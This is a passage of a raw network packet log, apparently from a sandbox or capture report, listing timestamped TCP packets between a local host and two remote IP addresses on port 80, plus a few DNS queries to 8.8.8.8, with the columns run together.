                                                                            Oct 24, 2024 08:53:08.855880976 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.855901957 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.855925083 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.855926991 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.855940104 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.855957985 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.855962992 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.855989933 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.856003046 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.856003046 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.856018066 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.856045961 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.963556051 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.963596106 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.963609934 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.963624954 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.963639975 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.963654995 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.963663101 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.963690996 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.963699102 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.963721991 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.963743925 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.963774920 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.963794947 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.963829041 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.963844061 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.963865995 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.963867903 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.963916063 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.964171886 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.964194059 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.964209080 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.964232922 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.964278936 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.964292049 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.964307070 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.964322090 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.964324951 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.964361906 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.964384079 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.964700937 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.964744091 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.964747906 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.964761019 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.964776039 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.964792013 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.964936972 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.964982986 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.965018034 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.965033054 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.965060949 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.965116024 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.965131044 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.965146065 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.965161085 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.965178967 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.965387106 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.965401888 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.965416908 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.965431929 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.965431929 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.965451002 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.965899944 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.965940952 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.965974092 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.965987921 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.966031075 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.966058016 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.966072083 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.966087103 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.966099977 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.966121912 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.966264963 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.966279984 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.966295004 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.966308117 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.966310024 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.966332912 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.966789961 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.966833115 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.966840982 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.966855049 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.966907978 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.966959000 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.966973066 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.966986895 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.967001915 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.967008114 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.967026949 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.967047930 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.967148066 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.967163086 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.967176914 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.967191935 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.967221975 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.969305038 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.969332933 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.969348907 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.969377041 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.969384909 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.969393015 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.969404936 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.969419956 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.969441891 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.969566107 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.969578028 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.969619036 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.969820976 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.969835043 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.969849110 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.969863892 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.969897032 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.969899893 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.969913006 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.969955921 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.970067978 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.970114946 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.970129013 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.970165014 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.970300913 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.970340014 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.970390081 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.970454931 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.970467091 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.970508099 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.970968962 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.970982075 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.970997095 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.971018076 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.971018076 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.971033096 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.971048117 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.971054077 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.971079111 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.971138000 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.971152067 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.971165895 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.971179962 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.971187115 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.971216917 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.972641945 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.972697973 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.972712994 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.972739935 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.972779036 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.972793102 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.972807884 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.972821951 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.972824097 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.972845078 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.973166943 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.973210096 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.973217010 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.973232031 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.973264933 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.973289967 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.973304033 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.973319054 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.973335981 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.080569029 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.080590010 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.080615997 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.080631018 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.080643892 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.080667019 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.080683947 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.080687046 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.080698967 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.080713987 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.080718040 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.080718040 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.080729008 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.080754042 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.080785036 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.080799103 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.080815077 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.080823898 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.080842972 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.080943108 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.080959082 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.080974102 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.080986977 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081003904 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.081012011 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081024885 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081033945 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.081041098 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081053019 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081080914 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.081089020 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081101894 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081116915 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081116915 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.081135988 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.081171989 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081186056 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081201077 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081218004 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.081233025 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.081235886 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081257105 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081291914 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081302881 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.081335068 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081350088 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081379890 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.081430912 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081444979 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081460953 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081481934 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.081496954 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.081528902 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081549883 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081588984 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.081598043 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081612110 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081626892 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081649065 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.081690073 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081705093 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081734896 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.081748962 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081764936 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081790924 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.081804037 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081819057 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081845999 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.081899881 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081916094 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081932068 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081944942 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.081959009 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.081984043 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.081998110 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082036972 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.082062960 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082077980 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082110882 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.082154989 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082169056 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082182884 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082197905 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082211971 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.082212925 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082231998 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.082264900 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082302094 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082310915 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.082350969 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082365036 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082379103 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082400084 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.082416058 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082459927 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.082521915 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082535982 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082551003 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082565069 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082566977 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.082580090 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082602978 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.082664013 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082678080 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082710981 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082716942 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.082722902 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082756996 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.082813978 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082827091 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082842112 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082854986 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082864046 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.082870007 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082891941 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.082958937 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082973957 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.082987070 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083003044 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.083040953 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083055973 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083070993 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083085060 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.083096981 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.083185911 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083200932 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083214998 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083229065 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083242893 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.083244085 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083256006 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083261013 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.083296061 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.083352089 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083367109 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083380938 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083395958 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083409071 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.083434105 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.083494902 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083515882 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083529949 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083544016 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083553076 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.083583117 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.083615065 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083628893 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083643913 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083657026 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:09.083661079 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.083698034 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:09.178452969 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:10.089751005 CEST4916980192.168.2.22208.95.112.1
                                                                            Oct 24, 2024 08:53:10.095297098 CEST8049169208.95.112.1192.168.2.22
                                                                            Oct 24, 2024 08:53:10.095354080 CEST4916980192.168.2.22208.95.112.1
                                                                            Oct 24, 2024 08:53:10.095597982 CEST4916980192.168.2.22208.95.112.1
                                                                            Oct 24, 2024 08:53:10.100918055 CEST8049169208.95.112.1192.168.2.22
                                                                            Oct 24, 2024 08:53:10.690785885 CEST8049169208.95.112.1192.168.2.22
                                                                            Oct 24, 2024 08:53:10.900126934 CEST8049169208.95.112.1192.168.2.22
                                                                            Oct 24, 2024 08:53:10.900180101 CEST4916980192.168.2.22208.95.112.1
                                                                            Oct 24, 2024 08:53:48.451442003 CEST8049169208.95.112.1192.168.2.22
                                                                            Oct 24, 2024 08:53:48.451518059 CEST4916980192.168.2.22208.95.112.1
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 24, 2024 08:52:44.235963106 CEST5456253192.168.2.228.8.8.8
                                                                            Oct 24, 2024 08:52:45.235843897 CEST5456253192.168.2.228.8.8.8
                                                                            Oct 24, 2024 08:52:45.334414959 CEST53545628.8.8.8192.168.2.22
